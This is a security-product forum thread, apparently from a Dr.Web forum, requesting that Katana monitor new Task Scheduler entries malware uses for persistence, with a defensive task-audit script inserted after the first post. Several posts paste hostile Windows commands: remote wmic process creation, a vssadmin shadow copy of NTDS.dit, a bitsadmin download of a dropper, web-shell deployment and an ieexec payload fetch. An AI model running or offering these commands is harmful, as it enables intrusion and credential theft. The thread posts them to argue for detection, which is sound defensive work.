KATANA feature request

6 replies to this topic

#1 sepik

    Newbie

  • Posters
  • 5 posts

Posted 11 May 2021 - 13:21

Hello,

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?

I've been testing SS Beta for several months against different kinds of malware and I really liked how Katana/DPD/DPH blocks some unknown malware.

Of course, some unknown malware gets through (I've submitted a dozen of them to the virus lab), and some of them add a task scheduler entry that calls undetected dropped files in the %appdata% roaming dir.

So every time the PC gets booted, the malware can run its dropped files via the task scheduler.

Regards,

-sepik
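A defender-side check for the persistence pattern sepik describes (a scheduled task whose action launches a dropped file from the roaming AppData folder at boot or logon). This is an added example, not code from the thread or from Dr.Web's products: it parses Task Scheduler XML definitions, and the two task documents embedded in it are constructed samples with hypothetical paths.

```python
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Matches the unexpanded %APPDATA% variable as well as the expanded roaming path.
APPDATA_RE = re.compile(r"%appdata%|\\appdata\\roaming\\", re.IGNORECASE)
STARTUP_TRIGGERS = {"BootTrigger", "LogonTrigger"}


def audit_task_xml(xml_doc):
    """One finding per Exec action pointing into AppData\\Roaming, tagged by trigger kind."""
    root = ET.fromstring(xml_doc)
    trig = root.find("t:Triggers", NS)
    names = [] if trig is None else [t.tag.rsplit("}", 1)[-1] for t in trig]
    when = "boot/logon" if STARTUP_TRIGGERS & set(names) else "other"
    findings = []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", "", NS).strip()
        args = ex.findtext("t:Arguments", "", NS).strip()
        if APPDATA_RE.search(cmd) or APPDATA_RE.search(args):
            findings.append(f"{when} trigger -> {cmd} {args}".strip())
    return findings


def audit_tasks_dir(tasks_dir=r"C:\Windows\System32\Tasks"):
    """Walk the live task store (UTF-16 XML files, read as bytes so expat honours the declaration)."""
    hits = {}
    for dirpath, _, files in os.walk(tasks_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings = audit_task_xml(fh.read())
            except (OSError, ET.ParseError):
                continue  # not a task definition, or unreadable
            if findings:
                hits[path] = findings
    return hits


# Constructed samples with hypothetical paths, not tasks from the thread.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\\Users\\alice\\AppData\\Roaming\\Updater\\svc.exe</Command>
    <Arguments>/silent</Arguments></Exec></Actions></Task>"""
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2021-05-11T13:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Vendor\\backup.exe</Command></Exec></Actions></Task>"""
```

Running `audit_tasks_dir()` as an administrator on a Windows host lists every task file whose action or arguments resolve into AppData\Roaming, with boot/logon-triggered ones called out.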


#2 sepik

    Newbie

  • Posters
  • 5 posts

Posted 11 May 2021 - 16:46

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

To kill an AV and any firewall product installed.

It seems that it creates "calc.exe" to gain the system account, and when you have system privileges, the whole system is compromised.

Regards,

-sepik



#3 sepik

    Newbie

  • Posters
  • 5 posts

Posted 11 May 2021 - 16:51

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

To kill an AV and any firewall product installed.

It seems that it creates "calc.exe" to gain the system account, and when you have system privileges, the whole system is compromised.

Also, as a signed MS component, bitsadmin.exe /transfer "DonwloadFile" http://www.mypage.com/%temp/mydropper.html gets through too.

Regards,

-sepik



#4 sepik

    Newbie

  • Posters
  • 5 posts

Posted 11 May 2021 - 17:18

Sorry, double post.

-sepik



#5 SergSG

    The Master

  • Posters
  • 14 425 posts

Posted 11 May 2021 - 17:54

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?

Of course, some unknown malware gets through (I've submitted a dozen of them to the virus lab), and some of them add a task scheduler entry that calls undetected dropped files in the %appdata% roaming dir.

So every time the PC gets booted, the malware can run its dropped files via the task scheduler.

+1



#6 sepik

    Newbie

  • Posters
  • 5 posts

Posted 11 May 2021 - 19:54

xcopy #{web_shells} C:\inetpub\wwwroot
xcopy PathToAtomicsFolder\T1100\shells\ C:\inetpub\wwwroot
ieexec.exe http://*:8080/bypass.exe



#7 usverg

    Advanced Member

  • Posters
  • 700 posts

Posted 12 May 2021 - 08:01

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?

Definitely +1

But a thing of beauty, I know, will never fade away...


